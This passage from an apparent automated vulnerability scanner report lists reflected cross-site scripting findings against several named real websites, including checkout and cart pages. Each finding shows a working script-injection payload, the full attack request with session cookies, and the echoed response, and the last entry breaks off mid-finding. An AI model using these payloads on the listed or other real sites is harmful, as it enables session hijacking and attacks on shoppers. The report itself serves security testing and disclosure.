Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:27 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 565

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
height="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.114078968763351449f79c'-alert(1)-'99a5d4b72c7&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html">
...[SNIP]...
5.45. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 80609--><script>alert(1)</script>1ecec661735 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=80609--><script>alert(1)</script>1ecec661735&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 80609--><script>alert(1)</script>1ecec661735|697 -- -->
...[SNIP]...
5.46. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 8770d<script>alert(1)</script>23979558cba was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f90628770d<script>alert(1)</script>23979558cba&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
</script>e58fc9f90628770d<script>alert(1)</script>23979558cba|697 -- -->
...[SNIP]...
5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ef24</script><script>alert(1)</script>8b8d97eb0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:50:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39857
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkcheck
...[SNIP]...
5.48. http://my-happyfeet.com/cart.asp [rp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the rp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdeac</script><script>alert(1)</script>ad279ee61f3 was submitted in the rp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:49:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39841
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
hecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkchecked
...[SNIP]...
5.49. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 4c995%0aalert(1)//39aa684e7cf was submitted in the url parameter. This input was echoed as 4c995
alert(1)//39aa684e7cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml4c995%0aalert(1)//39aa684e7cf&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1300632449.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.2120303763.1300632449.1300817215.1301068080.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sat, 26 Mar 2011 11:52:00 GMT
Expires: Sat, 26 Mar 2011 11:52:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 116
Server: GSE

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml4c995
alert(1)//39aa684e7cf. HTTP error 400
5.50. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c655e<script>alert(1)</script>3c3794184e6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9?callback=BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6&cb=931 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 70
Cache-Control: max-age=3600
Expires: Sat, 26 Mar 2011 21:36:24 GMT
Date: Sat, 26 Mar 2011 20:36:24 GMT
Connection: close

BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6(0);
5.51. https://secure.avangate.com/order/cart.php [CART_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4dd"><script>alert(1)</script>3aab9aad0e510441a was submitted in the CART_ID parameter. This input was echoed as ad4dd\"><script>alert(1)</script>3aab9aad0e510441a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd"><script>alert(1)</script>3aab9aad0e510441a&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:14:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd\"><script>alert(1)</script>3aab9aad0e510441a" target="_blank">
...[SNIP]...
5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1796"><script>alert(1)</script>4ed955d9ca569fbd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1796\"><script>alert(1)</script>4ed955d9ca569fbd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796"><script>alert(1)</script>4ed955d9ca569fbd452e03&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:14:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796\"><script>alert(1)</script>4ed955d9ca569fbd452e03" target="_blank">
...[SNIP]...
5.53. https://secure.avangate.com/order/checkout.php [CART_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e831e"><script>alert(1)</script>4dbe77a7b98 was submitted in the CART_ID parameter. This input was echoed as e831e\"><script>alert(1)</script>4dbe77a7b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e"><script>alert(1)</script>4dbe77a7b98 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e\"><script>alert(1)</script>4dbe77a7b98" target="_blank">
...[SNIP]...
5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5c0"><script>alert(1)</script>476da428095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5c0\"><script>alert(1)</script>476da428095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0"><script>alert(1)</script>476da4280952e03 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0\"><script>alert(1)</script>476da4280952e03" target="_blank">
...[SNIP]...
5.55. https://secure.shareit.com/shareit/checkout.html [prno parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The value of the prno request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f was submitted in the prno parameter. This input was echoed as e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f&DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_COUNTRY_ID=400&VATID=&PHONE=&FAX=&EMAIL=&EMAIL_CONFIRM=&PAYMENTTYPE_ID=&CURRENCY_ID=USD&BUTTON_NEXT.x=11&BUTTON_NEXT.y=5&BUTTON_NEXT=Next&progress=ADDITIONAL&FROM_PERSONAL=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:14:50 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
<form action="checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f" method="post" name="personal">
...[SNIP]...
5.56. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload 15362<script>alert(1)</script>c2ae901adec was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

